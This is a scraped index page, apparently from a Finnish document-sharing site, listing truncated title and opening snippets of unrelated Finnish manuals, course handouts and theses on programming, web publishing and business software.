T106.1208 Ohjelmoinnin perusteet Y (Python) Opetusmoniste kevät 2010 T106.1208 Ohjelmoinnin perusteet Y (Python) Opetusmoniste kevät 2010 Kerttu Pollari-Malmi c Kerttu Pollari-Malmi Sisältö 1 Tietokoneista ja ohjelmista 1 1.1 Lyhyesti tietokoneen rakenteesta....................

Lisätiedot

13. Pintaa syvemmältä 233

13. Pintaa syvemmältä 233 13. Pintaa syvemmältä 233 OPPITUNTI 13 Pintaa syvemmältä Tällä tunnilla tutkimme joitakin funktioita, joilla saamme informaatiota ympäristöstä tai kommunikoimme ulkoisen maailman kanssa. Tämän tunnin aiheita

Lisätiedot

OPETTAJAN OPAS VERSIO 1.5.2

OPETTAJAN OPAS VERSIO 1.5.2 OPETTAJAN OPAS VERSIO 1.5.2 Sisältö: Sisältö:... 2 Yleistä Moodlesta... 5 Navigointi ja liikkuminen... 5 Ympäristön aloitussivu... 5 Sisäänkirjautuminen... 6 Kurssit ja työtilat... 6 Kurssin aloitussivu...

Lisätiedot

MIKKO HAAPANEN AJAX-TEKNIIKOIDEN HYÖDYNTÄMINEN VAISALA ROSA -SÄÄASEMAN SELAINKÄYTTÖLIITTYMÄSSÄ

MIKKO HAAPANEN AJAX-TEKNIIKOIDEN HYÖDYNTÄMINEN VAISALA ROSA -SÄÄASEMAN SELAINKÄYTTÖLIITTYMÄSSÄ MIKKO HAAPANEN AJAX-TEKNIIKOIDEN HYÖDYNTÄMINEN VAISALA ROSA -SÄÄASEMAN SELAINKÄYTTÖLIITTYMÄSSÄ Kandidaatintyö Tarkastaja: Mikko Salmenperä II TIIVISTELMÄ TAMPEREEN TEKNILLINEN YLIOPISTO Automaatiotekniikan

Lisätiedot

Tikon ostolaskujen käsittely

Tikon ostolaskujen käsittely Toukokuu 2012 1 (57) Käyttöohje 6.1.2 SP1 Copyright Aditro 2012 Toukokuu 2012 2 (57) Sisällysluettelo Johdanto... 4 1. Järjestelmävaatimukset... 5 1.1. Sovellusversion päivitys... 7 1.2. Internet Explorer

Lisätiedot

R-KIELEN PERUSTEET Jarno Tuimala Helsinki 2010

R-KIELEN PERUSTEET Jarno Tuimala Helsinki 2010 R-KIELEN PERUSTEET R-KIELEN PERUSTEET Jarno Tuimala Helsinki 2010 Jarno Tuimala 1. painos R KIELEN PERUSTEET Lukijalle Tavoitteet Tämä kirja esittelee R-kielen perusteet ja muutamia ohjelmointiin liittyviä

Lisätiedot

Käyttöohje. Labra. Helsinki 25.8.2008 Ohjelmistotuotantoprojekti HELSINGIN YLIOPISTO Tietojenkäsittelytieteen laitos

Käyttöohje. Labra. Helsinki 25.8.2008 Ohjelmistotuotantoprojekti HELSINGIN YLIOPISTO Tietojenkäsittelytieteen laitos Käyttöohje Labra Helsinki 25.8.2008 Ohjelmistotuotantoprojekti HELSINGIN YLIOPISTO Tietojenkäsittelytieteen laitos 1 Kurssi 581260 Ohjelmistotuotantoprojekti (9+1op) Projektiryhmä Henrik Naakka, projektipäällikkö,

Lisätiedot

WordPress 3. Tietokantapohjainen julkaisujärjestelmä. Jari Sarja / Otavan Opisto 2013

WordPress 3. Tietokantapohjainen julkaisujärjestelmä. Jari Sarja / Otavan Opisto 2013 WordPress 3 Tietokantapohjainen julkaisujärjestelmä Jari Sarja / Otavan Opisto 2013 Tämä oppimateriaali on lisensoitu Creative Commons Nimeä-Tarttuva 3.0 -lisenssillä Sisältö 1. Bloggaus... 6 2. Blogipalveluita

Lisätiedot

Joona Kannisto MAINEENHALLINTAJÄRJESTELMÄN RAKENTAMINEN YHTEISÖLLISEN OPETUSPORTAALIN KÄYTTÖÖN

Joona Kannisto MAINEENHALLINTAJÄRJESTELMÄN RAKENTAMINEN YHTEISÖLLISEN OPETUSPORTAALIN KÄYTTÖÖN Joona Kannisto MAINEENHALLINTAJÄRJESTELMÄN RAKENTAMINEN YHTEISÖLLISEN OPETUSPORTAALIN KÄYTTÖÖN Kandidaatintyö Tarkastaja: lehtori Jukka Koskinen II TIIVISTELMÄ TAMPEREEN TEKNILLINEN YLIOPISTO Signaalinkäsittelyn

Lisätiedot

OUTDOORSFINLAND.FI -SIVUSTON TOTEUTUS

OUTDOORSFINLAND.FI -SIVUSTON TOTEUTUS OUTDOORSFINLAND.FI -SIVUSTON TOTEUTUS LAHDEN AMMATTIKORKEAKOULU Tekniikan ala Tietotekniikan koulutusohjelma Ohjelmistotekniikka Opinnäytetyö Kevät 2014 Jani Nikula Lahden ammattikorkeakoulu Tietotekniikan

Lisätiedot

Käyttäjienhallintatyökalu

Käyttäjienhallintatyökalu Käyttäjienhallintatyökalu 2 Käyttäjienhallinta-ohje Sisällysluettelo 1 Yleistä Käyttäjienhallintatyökalusta... 3 1.1 Excel-taulukko csv-tiedoston luomisessa...4 2 Käyttäjien luominen... 4 2.1 Käyttäjien

Lisätiedot

Samuel Rinnetmäki. WWW-palvelujen tuotantoympäristö

Samuel Rinnetmäki. WWW-palvelujen tuotantoympäristö Espoon Vantaan teknillinen ammattikorkeakoulu Viestintätekniikan koulutusohjelma Samuel Rinnetmäki WWW-palvelujen tuotantoympäristö Insinöörityö. 28.5.2001 Työn ohjaaja: Työn valvoja: Kielenvalvoja: kehityspäällikkö

Lisätiedot

D.O.it Osteopaatin ohjelmisto

D.O.it Osteopaatin ohjelmisto D.O.it Osteopaatin ohjelmisto Versio 1.7 Copyright 2009-2014 Ere Maijala Sisällysluettelo JOHDANTO...3 YLEISTÄ D.O.IT:N KÄYTÖSTÄ...3 TOIMINNOT...3 ETUSIVU...3 ASIAKKAAT...4 Lapset ja muut huollettavat...4

Lisätiedot

Valinnat ja päätökset

Valinnat ja päätökset Valinnat ja päätökset 4 Valinnat ja päätökset Päätöksenteko on erittäin tärkeässä asemassa kaikissa ohjelmointikielissä. Jos ohjelman lauseiden suoritusjärjestystä ei voitaisi muuttaa tietojen vertailun

Lisätiedot

Kotisivuohjeet. Eteläpohjalaiset Kylät ry. Sivupohjien rakenne

Kotisivuohjeet. Eteläpohjalaiset Kylät ry. Sivupohjien rakenne Kotisivuohjeet Tässä ohjeessa käydään läpi kotisivujen tekemisen perusteet keskittyen html-koodiin ja sen ominaisuuksiin. Ohjetta voidaan käyttää sivupohjien luonnin apuna, on kuitenkin suositeltavaa että

Lisätiedot

Anders Managerin ohje... 1 Yleistä... 1 Automaattinen laskutus... 1 Selainvalinta... 1 Kirjautuminen järjestelmään... 1 Etusivun tiedot...

Anders Managerin ohje... 1 Yleistä... 1 Automaattinen laskutus... 1 Selainvalinta... 1 Kirjautuminen järjestelmään... 1 Etusivun tiedot... Anders Managerin ohje... 1 Yleistä... 1 Automaattinen laskutus... 1 Selainvalinta... 1 Kirjautuminen järjestelmään... 1 Etusivun tiedot... 3 Palaute ja tuki... 3 Sanasto... 4 Pikaopas... 6 Käy asetukset

Lisätiedot

HINNASTOJEN PÄIVITYKSET JA HINNASTOJEN TEKO

HINNASTOJEN PÄIVITYKSET JA HINNASTOJEN TEKO HINNASTOJEN PÄIVITYKSET JA HINNASTOJEN TEKO Hinnastojen käsittely Sisällys i Sisällys HINNASTOJEN PÄIVITTÄMISESTÄ YLEISESTI... 1 YLEISTÄ... 1 HINNASTOJEN MUOTO... 1 OSTOHINNAT HINNASTOSSA TULEVILLE TUOTTEILLE...

Lisätiedot

Sisältö 1 Tekijänoikeudet...8 2 Johdatus M-Filesiin...9 3 Ohjelmiston asennus ja käyttöönotto...10 4 M-Filesin päivittäinen käyttö...

Sisältö 1 Tekijänoikeudet...8 2 Johdatus M-Filesiin...9 3 Ohjelmiston asennus ja käyttöönotto...10 4 M-Filesin päivittäinen käyttö... M-Files 10 Sisältö 1 Tekijänoikeudet...8 2 Johdatus M-Filesiin...9 3 Ohjelmiston asennus ja käyttöönotto...10 3.1 Järjestelmävaatimukset...10 3.2 Automatisoitu asennus ja jakelu...11 3.3 Asennuksen läpivienti...11

Lisätiedot

Taseri PRO 2.0 Käyttöohje. Taseri PRO 2.0. Web-Media 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008

Taseri PRO 2.0 Käyttöohje. Taseri PRO 2.0. Web-Media 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008 1 Taseri PRO 2.0 Käyttöohje Taseri PRO 2.0 Web-Media 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008 T A S E R I P R O Y H D I S T Y K S E N K I R J A N P I TO- O H J E L M A Käyttöohje Web-Media

Lisätiedot

Tietokantojen turvallisuus

Tietokantojen turvallisuus Tietokantojen turvallisuus Miro Holopainen Jenni Kallanto IIO30220 Database Management Raportti Huhtikuu 2014 Ohjelmistotekniikan koulutusohjelma Tekniikan ja liikenteen ala Sisällysluettelo 1 JOHDANTO...3

Lisätiedot

AB-ajokortti 2 Yhteiskäyttö

AB-ajokortti 2 Yhteiskäyttö AB-ajokortti 2 Yhteiskäyttö SISÄLLYS Sisällys... 2 Kurssiaineiston sisältö... 4 Käyttöjärjestelmän mukauttaminen... 4 Tiedostohallinnan asetukset ja pikakuvakkeet... 4 Ikkunoiden hallinta... 4 Tiedoston

Lisätiedot

20.8.2014. Projektiryhmä. Käyttöohjeet. Kuksa Jäsenrekisteri. sivu 1/96

20.8.2014. Projektiryhmä. Käyttöohjeet. Kuksa Jäsenrekisteri. sivu 1/96 Käyttöohjeet Kuksa Jäsenrekisteri sivu 1/96 Contents 1 Johdanto... 5 1.1 Käytön tuki... 5 2 Kirjautuminen Kuksa -jäsenrekisteriin... 5 2.1 Yleistä... 5 2.2 PartioID... 5 2.3 Virhetilanteet... 6 2.3.1 Rekisteröityminen

Lisätiedot

FirstOffice Johdanto ja asennus

FirstOffice Johdanto ja asennus Johdanto ja asennus Kappale 1: Johdanto ja asennus FirstOffice on integroitu taloushallinto-ohjelma pienyrityksille Windows, Macintosh ja Linux käyttöympäristöihin. Se sisältää laskutuksen, osto- ja myyntireskontran,

Lisätiedot

Hallintaportaalin pääkäyttäjän opas

Hallintaportaalin pääkäyttäjän opas Hallintaportaalin pääkäyttäjän opas Sonera Yrityssähköposti Sonera Työtila Sonera Toimistoviestintä 27.11.2012 Sisältö 1/39 Sonera Toimisto -palveluiden pääkäyttäjän opas 27.11.2012 1 Perusteet... 4 1.1

Lisätiedot

SELKOTIETO OY. Netti-Jäseri Käyttöohje. Netti-Jäseri

SELKOTIETO OY. Netti-Jäseri Käyttöohje. Netti-Jäseri 1 SELKOTIETO OY Netti-Jäseri Käyttöohje Netti-Jäseri N E T T I - J Ä S E R I Y H D I S T Y K S E N J Ä S E N R E K I S T E R I O H J E L M A Käyttöohje Selkotieto Oy PL 24 00351 HELSINKI Puh. 050 517 5386

Lisätiedot

Asennusopas Tarkistusversio B. McAfee SaaS Web Protection Service

Asennusopas Tarkistusversio B. McAfee SaaS Web Protection Service Asennusopas Tarkistusversio B McAfee SaaS Web Protection Service COPYRIGHT Copyright 2013 McAfee, Inc. Älä kopioi ilman lupaa. TUOTEMERKIT McAfee, McAfee logo, McAfee Active Protection, McAfee CleanBoot,

Lisätiedot

Visma Monipankki. Käyttäjän käsikirja

Visma Monipankki. Käyttäjän käsikirja Visma Monipankki Käyttäjän käsikirja Oppaan päiväys: 10.10.2011. Asiakaspalvelu: Helpdesk: www.visma.fi Visma Software Oy pidättää itsellään oikeuden mahdollisiin parannuksiin ja/tai muutoksiin tässä oppaassa

Lisätiedot